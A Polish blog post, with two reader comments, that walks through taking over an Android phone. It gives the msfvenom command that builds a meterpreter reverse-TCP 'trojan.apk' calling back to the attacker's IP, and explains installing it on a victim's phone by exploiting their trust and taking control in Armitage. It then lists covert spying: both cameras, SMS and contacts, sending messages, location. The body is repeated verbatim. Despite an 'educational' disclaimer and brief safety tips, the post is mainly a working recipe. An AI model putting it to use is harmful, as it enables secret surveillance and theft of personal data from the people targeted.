Przejmowanie kontroli nad Androidem. ParrotOS/armitage.
Za kilka dni odbędzie się dzień otwarty w mojej szkole. A jako, że zawaliłem drugą klasę, nie załapałem się na praktyki zagraniczne i zostałem w Polsce, muszę przy nich pomagać. Mój brak doświadczenia i umiejętności spowodował, że poszedłem na łatwiznę na tyle ile się dało i znalazłem najprostszy sposób przejęcia kontroli nad system Android. Nie spodziewałem się, że to aż tak prosta sprawa, może to zrobić w zasadzie każdy, a ofiara nawet się nie zorientuje. Dlatego warto uczyć się informatyki. Ochrona przed takimi atakami będzie w niedalekiej przyszłości niezbędna.
Do przeprowadzenia całego ataku wystarczy system do pentestów- Kali Linux, lub ParrotOs i zaufanie ofiary co do korzystania z jej telefonu. Opcjonalnie dobre umiejętności SocialEngineering. Będziemy potrzebowali dostępu do urządzenia ofiary na krótką chwilę.
Wygenerujemy plik "trojan.apk", który będziemy musieli zainstalować na telefonie ofiary(musi mieć możliwość instalowania aplikacji z nieznanych źródłem). Program instaluje się raz, następnie działa w tle jako Serwis.
Potem, dzięki Armitage, przejmiemy kontrolę nad Androidem.
(Armitage jest gotowym narzędziem wbudowanym w systemy pentesterskie. Służy do wizualizacji podatnych celów i proponowania exploitów)
Zaczniemy od wygenerowania trojana.
Odpalamy terminal, logujemy się na konto administratora root, komendą:
- sudo su
następnie uruchamiamy w nim serwer PostgreSQL, komendą:
-service postgresql start
Teraz wygenerujemy naszego trojana. W terminalu musimy wpisać komendę:
- sudo msfvenom -p android/meterpreter/reverse_tcp LHOST= TUTAJ WASZ ADRES IP LPORT=4444 -o trojan.apk
Plik pojawi się w folderze Home. Musimy go zgrać na urządzenie i zainstalować.
Teraz odpalamy Armitage. W pierwszy okienku nic nie zmieniamy.
W lewym menu wybieramy payload>android>meterpreter>reverce_tcp.
LHOST powinien być naszym adresem ip, a LPORT portem który wpisaliśmy generując trojana. Odpalamy.
Teraz program będzie czekał na sygnał z telefonu. Uruchamiamy trojana na naszym urządzeniu.Musi być w tej samej sieci lokalnej w której jest nasz komputer. I gotowe.
Pojawia się urządzenie naszej ofiary.
Klikamy PPM na ofiarę>mterpreter 1>Interact>Meterpreter Shell.
Jesteśmy w urządzeniu ofiary.
Poprzez komendy możemy robić wszystko z urządzeniem ofiary pomimo zablokowanego ekranu. Możemy robić zdjęcia obiema kamerkami, zgrać wszystkie wiadomości SMS, kontakty do pliku na komputerze, odpalać każdą aplikacje na urządzeniu, wysyłać wiadomości z numeru ofiary, określić jego lokalizację. Możemy wszystko a ofiara nawet się nie zorientuje.
Wpisując >help, macie całą listę dostępnych poleceń.
Jeśli zachowacie ostrożność, nie będziecie instalować pirackich aplikacji z nieznanych źródeł i żadna z zaufanych wam bliskich nie przeprowadzi na was takiego ataku będzie bezpieczni, ale warto pamiętać o tym jakie to proste.
Hexslav
Wpis nie ma na celu namawiania do przestępstwa, jest czysto edukacyjny. Służy jako przestroga przed nieostrożnym używaniem telefonu i udostępnianie go znajomym.
Do przeprowadzenia całego ataku wystarczy system do pentestów- Kali Linux, lub ParrotOs i zaufanie ofiary co do korzystania z jej telefonu. Opcjonalnie dobre umiejętności SocialEngineering. Będziemy potrzebowali dostępu do urządzenia ofiary na krótką chwilę.
Wygenerujemy plik "trojan.apk", który będziemy musieli zainstalować na telefonie ofiary(musi mieć możliwość instalowania aplikacji z nieznanych źródłem). Program instaluje się raz, następnie działa w tle jako Serwis.
Potem, dzięki Armitage, przejmiemy kontrolę nad Androidem.
(Armitage jest gotowym narzędziem wbudowanym w systemy pentesterskie. Służy do wizualizacji podatnych celów i proponowania exploitów)
Zaczniemy od wygenerowania trojana.
Odpalamy terminal, logujemy się na konto administratora root, komendą:
- sudo su
następnie uruchamiamy w nim serwer PostgreSQL, komendą:
-service postgresql start
Teraz wygenerujemy naszego trojana. W terminalu musimy wpisać komendę:
- sudo msfvenom -p android/meterpreter/reverse_tcp LHOST= TUTAJ WASZ ADRES IP LPORT=4444 -o trojan.apk
Plik pojawi się w folderze Home. Musimy go zgrać na urządzenie i zainstalować.
Teraz odpalamy Armitage. W pierwszy okienku nic nie zmieniamy.
W lewym menu wybieramy payload>android>meterpreter>reverce_tcp.
LHOST powinien być naszym adresem ip, a LPORT portem który wpisaliśmy generując trojana. Odpalamy.
Teraz program będzie czekał na sygnał z telefonu. Uruchamiamy trojana na naszym urządzeniu.Musi być w tej samej sieci lokalnej w której jest nasz komputer. I gotowe.
Pojawia się urządzenie naszej ofiary.
Klikamy PPM na ofiarę>mterpreter 1>Interact>Meterpreter Shell.
Jesteśmy w urządzeniu ofiary.
Poprzez komendy możemy robić wszystko z urządzeniem ofiary pomimo zablokowanego ekranu. Możemy robić zdjęcia obiema kamerkami, zgrać wszystkie wiadomości SMS, kontakty do pliku na komputerze, odpalać każdą aplikacje na urządzeniu, wysyłać wiadomości z numeru ofiary, określić jego lokalizację. Możemy wszystko a ofiara nawet się nie zorientuje.
Wpisując >help, macie całą listę dostępnych poleceń.
Jeśli zachowacie ostrożność, nie będziecie instalować pirackich aplikacji z nieznanych źródeł i żadna z zaufanych wam bliskich nie przeprowadzi na was takiego ataku będzie bezpieczni, ale warto pamiętać o tym jakie to proste.
Hexslav
Wpis nie ma na celu namawiania do przestępstwa, jest czysto edukacyjny. Służy jako przestroga przed nieostrożnym używaniem telefonu i udostępnianie go znajomym.
A jeśli robię to na Kali Linuxie to jaki jest zamiennik Armitage?
OdpowiedzUsuńo ile się nie mylę armitage jest też na kalim
Usuń:)
OdpowiedzUsuń